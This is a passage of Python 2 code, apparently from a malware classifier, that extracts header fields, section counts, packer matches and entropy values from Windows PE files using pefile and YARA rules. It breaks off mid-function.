"e_cp", \ 32 | "e_cparhdr",\ 33 | "e_maxalloc",\ 34 | "e_sp",\ 35 | "e_lfanew"] 36 | 37 | FILE_HEADER= ["NumberOfSections","CreationYear"] + [ "FH_char" + str(i) for i in range(15)] 38 | 39 | OPTIONAL_HEADER1 = [ 40 | "MajorLinkerVersion",\ 41 | "MinorLinkerVersion",\ 42 | "SizeOfCode",\ 43 | "SizeOfInitializedData",\ 44 | "SizeOfUninitializedData",\ 45 | "AddressOfEntryPoint",\ 46 | "BaseOfCode",\ 47 | "BaseOfData",\ 48 | "ImageBase",\ 49 | "SectionAlignment",\ 50 | "FileAlignment",\ 51 | "MajorOperatingSystemVersion",\ 52 | "MinorOperatingSystemVersion",\ 53 | "MajorImageVersion",\ 54 | "MinorImageVersion",\ 55 | "MajorSubsystemVersion",\ 56 | "MinorSubsystemVersion",\ 57 | "SizeOfImage",\ 58 | "SizeOfHeaders",\ 59 | "CheckSum",\ 60 | "Subsystem"] 61 | OPTIONAL_HEADER_DLL_char = [ "OH_DLLchar" + str(i) for i in range(11)] 62 | 63 | OPTIONAL_HEADER2 = [ 64 | "SizeOfStackReserve",\ 65 | "SizeOfStackCommit",\ 66 | "SizeOfHeapReserve",\ 67 | "SizeOfHeapCommit",\ 68 | "LoaderFlags"] # boolean check for zero or not 69 | OPTIONAL_HEADER = OPTIONAL_HEADER1 + OPTIONAL_HEADER_DLL_char + OPTIONAL_HEADER2 70 | Derived_header = ["sus_sections","non_sus_sections", "packer","packer_type","E_text","E_data","filesize","E_file","fileinfo"] 71 | def __init__(self,source): 72 | self.source = source 73 | #Need PEiD rules compile with yara 74 | self.rules= yara.compile(filepath='./peid.yara') 75 | 76 | 77 | def file_creation_year(self,seconds): 78 | tmp = 1970 + ((int(seconds) / 86400) / 365) 79 | return int(tmp in range (1980,2017)) 80 | def FILE_HEADER_Char_boolean_set(self,pe): 81 | tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\ 82 | pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\ 83 | pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\ 84 | pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\ 85 | pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\ 86 | pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\ 87 | pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\ 88 | pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\ 89 | pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\ 90 | pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\ 91 | pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\ 92 | pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\ 93 | pe.FILE_HEADER.IMAGE_FILE_DLL,\ 94 | pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\ 95 | pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI 96 | ] 97 | return [int(s) for s in tmp] 98 | def OPTIONAL_HEADER_DLLChar(self,pe): 99 | tmp = [ 100 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\ 101 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\ 102 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT,\ 103 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\ 104 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\ 105 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\ 106 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\ 107 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\ 108 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\ 109 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\ 110 | pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF 111 | ] 112 | return [int(s) for s in tmp] 113 | def Optional_header_ImageBase(self,ImageBase): 114 | result= 0 115 | if ImageBase % (64 * 1024) == 0 and ImageBase in [268435456,65536,4194304]: 116 | result = 1 117 | return result 118 | def Optional_header_SectionAlignment(self,SectionAlignment,FileAlignment): 119 | """This is boolean function and will return 0 or 1 based on condidtions 120 | that it SectionAlignment must be greater than or equal to FileAlignment 121 | """ 122 | return int(SectionAlignment >= FileAlignment) 123 | def Optional_header_FileAlignment(self,SectionAlignment,FileAlignment): 124 | result =0 125 | if SectionAlignment >= 512: 126 | if FileAlignment % 2 == 0 and FileAlignment in range(512,65537): 127 | result =1 128 | else: 129 | if FileAlignment == SectionAlignment: 130 | result = 1 131 | return result 132 | def Optional_header_SizeOfImage(self,SizeOfImage,SectionAlignment): 133 | 134 | return int(SizeOfImage % SectionAlignment == 0) 135 | def Optional_header_SizeOfHeaders(self,SizeOfHeaders,FileAlignment): 136 | 137 | return int(SizeOfHeaders % FileAlignment == 0 ) 138 | def extract_dos_header(self,pe): 139 | IMAGE_DOS_HEADER_data = [ 0 for i in range(6)] 140 | try: 141 | IMAGE_DOS_HEADER_data = [ 142 | pe.DOS_HEADER.e_cblp,\ 143 | pe.DOS_HEADER.e_cp, \ 144 | pe.DOS_HEADER.e_cparhdr,\ 145 | pe.DOS_HEADER.e_maxalloc,\ 146 | pe.DOS_HEADER.e_sp,\ 147 | pe.DOS_HEADER.e_lfanew] 148 | except Exception, e: 149 | print e 150 | return IMAGE_DOS_HEADER_data 151 | def extract_file_header(self,pe): 152 | FILE_HEADER_data = [ 0 for i in range(3)] 153 | FILE_HEADER_char = [] 154 | try: 155 | FILE_HEADER_data = [ 156 | pe.FILE_HEADER.NumberOfSections, \ 157 | self.file_creation_year(pe.FILE_HEADER.TimeDateStamp)] 158 | FILE_HEADER_char = self.FILE_HEADER_Char_boolean_set(pe) 159 | except Exception, e: 160 | print e 161 | return FILE_HEADER_data + FILE_HEADER_char 162 | def extract_optional_header(self,pe): 163 | OPTIONAL_HEADER_data = [ 0 for i in range(21)] 164 | DLL_char =[] 165 | OPTIONAL_HEADER_data2 = [ 0 for i in range(6)] 166 | 167 | try: 168 | OPTIONAL_HEADER_data = [ 169 | pe.OPTIONAL_HEADER.MajorLinkerVersion,\ 170 | pe.OPTIONAL_HEADER.MinorLinkerVersion,\ 171 | pe.OPTIONAL_HEADER.SizeOfCode,\ 172 | pe.OPTIONAL_HEADER.SizeOfInitializedData,\ 173 | pe.OPTIONAL_HEADER.SizeOfUninitializedData,\ 174 | pe.OPTIONAL_HEADER.AddressOfEntryPoint,\ 175 | pe.OPTIONAL_HEADER.BaseOfCode,\ 176 | pe.OPTIONAL_HEADER.BaseOfData,\ 177 | #Check the ImageBase for the condition 178 | self.Optional_header_ImageBase(pe.OPTIONAL_HEADER.ImageBase),\ 179 | # Checking for SectionAlignment condition 180 | self.Optional_header_SectionAlignment(pe.OPTIONAL_HEADER.SectionAlignment,pe.OPTIONAL_HEADER.FileAlignment),\ 181 | #Checking for FileAlignment condition 182 | self.Optional_header_FileAlignment(pe.OPTIONAL_HEADER.SectionAlignment,pe.OPTIONAL_HEADER.FileAlignment),\ 183 | pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\ 184 | pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\ 185 | pe.OPTIONAL_HEADER.MajorImageVersion,\ 186 | pe.OPTIONAL_HEADER.MinorImageVersion,\ 187 | pe.OPTIONAL_HEADER.MajorSubsystemVersion,\ 188 | pe.OPTIONAL_HEADER.MinorSubsystemVersion,\ 189 | #Checking size of Image 190 | self.Optional_header_SizeOfImage(pe.OPTIONAL_HEADER.SizeOfImage,pe.OPTIONAL_HEADER.SectionAlignment),\ 191 | #Checking for size of headers 192 | self.Optional_header_SizeOfHeaders(pe.OPTIONAL_HEADER.SizeOfHeaders,pe.OPTIONAL_HEADER.FileAlignment),\ 193 | pe.OPTIONAL_HEADER.CheckSum,\ 194 | pe.OPTIONAL_HEADER.Subsystem] 195 | 196 | DLL_char = self.OPTIONAL_HEADER_DLLChar(pe) 197 | 198 | OPTIONAL_HEADER_data2= [ 199 | pe.OPTIONAL_HEADER.SizeOfStackReserve,\ 200 | pe.OPTIONAL_HEADER.SizeOfStackCommit,\ 201 | pe.OPTIONAL_HEADER.SizeOfHeapReserve,\ 202 | pe.OPTIONAL_HEADER.SizeOfHeapCommit,\ 203 | int(pe.OPTIONAL_HEADER.LoaderFlags == 0) ] 204 | except Exception, e: 205 | print e 206 | return OPTIONAL_HEADER_data + DLL_char + OPTIONAL_HEADER_data2 207 | def get_count_suspicious_sections(self,pe): 208 | result=[] 209 | tmp =[] 210 | benign_sections = set(['.text','.data','.rdata','.idata','.edata','.rsrc','.bss','.crt','.tls']) 211 | for section in pe.sections: 212 | tmp.append(section.Name.split('\x00')[0]) 213 | non_sus_sections = len(set(tmp).intersection(benign_sections)) 214 | result=[len(tmp) - non_sus_sections, non_sus_sections] 215 | return result 216 | def check_packer(self,filepath): 217 | result=[] 218 | matches = self.rules.match(filepath) 219 | if matches == [] or matches == {}: 220 | result.append([0]) 221 | else: 222 | result.append([1]) 223 | return result 224 | def get_text_data_entropy(self,pe): 225 | result=[0.0,0.0] 226 | for section in pe.sections: 227 | s_name = section.Name.split('\x00')[0] 228 | if s_name == ".text": 229 | result[0]= section.get_entropy() 230 | elif s_name == ".data": 231 | result[1]= section.get_entropy() 232 | else: 233 | pass 234 | return result 235 | def get_file_bytes_size(self,filepath): 236 | f = open(filepath, "rb") 237 | byteArr = map(ord, f.read()) 238 | f.close() 239 | fileSize = len(byteArr) 240 | return byteArr,fileSize 241 | def cal_byteFrequency(self,byteArr,fileSize): 242 | freqList = [] 243 | for b in range(256): 244 | ctr = 0 245 | for byte in byteArr: 246 | if byte == b: 247 | ctr += 1 248 | freqList.append(float(ctr) / fileSize) 249 | return freqList 250 | def get_file_entropy(self,filepath): 251 | byteArr, fileSize = self.get_file_bytes_size(filepath) 252 | freqList = self.cal_byteFrequency(byteArr,fileSize) 253 | # Shannon entropy 254 | ent = 0.0 255 | for freq in freqList: 256 | if freq > 0: 257 | ent += - freq * math.log(freq, 2) 258 | 259 | #ent = -ent 260 | 261 | return [fileSize,ent] 262 | def get_fileinfo(self,pe): 263 | result=[] 264 | try: 265 | FileVersion = pe.FileInfo[0].StringTable[0].entries['FileVersion'] 266 | ProductVersion = pe.FileInfo[0].StringTable[0].entries['ProductVersion'] 267 | ProductName = pe.FileInfo[0].StringTable[0].entries['ProductName'] 268 | CompanyName = pe.FileInfo[0].StringTable[0].entries['CompanyName'] 269 | #getting Lower and 270 | FileVersionLS = pe.VS_FIXEDFILEINFO.FileVersionLS 271 | FileVersionMS = pe.VS_FIXEDFILEINFO.FileVersionMS 272 | ProductVersionLS = pe.VS_FIXEDFILEINFO.ProductVersionLS 273 | ProductVersionMS = pe.VS_FIXEDFILEINFO.ProductVersionMS 274 | except Exception, e: 275 | result=["error"] 276 | #print "{} while opening {}".format(e,filepath) 277 | else: 278 | #shifting byte 279 | FileVersion = (FileVersionMS >> 16, FileVersionMS & 0xFFFF, FileVersionLS >> 16, FileVersionLS & 0xFFFF) 280 | ProductVersion = (ProductVersionMS >> 16, ProductVersionMS & 0xFFFF, ProductVersionLS >> 16, ProductVersionLS & 0xFFFF) 281 | result = [FileVersion,ProductVersion,ProductName,CompanyName] 282 | return int ( result[0] != 'error') 283 | 284 | def extract_all(self,filepath): 285 | data =[] 286 | #load given file 287 | try: 288 | pe = pefile.PE(filepath) 289 | except Exception, e: 290 | print "{} while opening {}".format(e,filepath) 291 | else: 292 | data += self.extract_dos_header(pe) 293 | data += self.extract_file_header(pe) 294 | data += self.extract_optional_header(pe) 295 | # derived features 296 | #number of suspicisou sections and non-suspicsious section 297 | num_ss_nss = self.get_count_suspicious_sections(pe) 298 | data += num_ss_nss 299 | # check for packer and packer type 300 | packer = self.check_packer(filepath) 301 | # Appending the packer info to the rest of features 302 | data += packer[0] 303 | entropy_sections = self.get_text_data_entropy(pe) 304 | data += entropy_sections 305 | f_size_entropy = self.get_file_entropy(filepath) 306 | data += f_size_entropy 307 | fileinfo = self.get_fileinfo(pe) 308 | data.append(fileinfo) 309 | 310 | 311 | return data 312 | 313 | def get_feature(self, filepath): 314 | 315 | data = self.extract_all(filepath) 316 | 317 | 318 | --------------------------------------------------------------------------------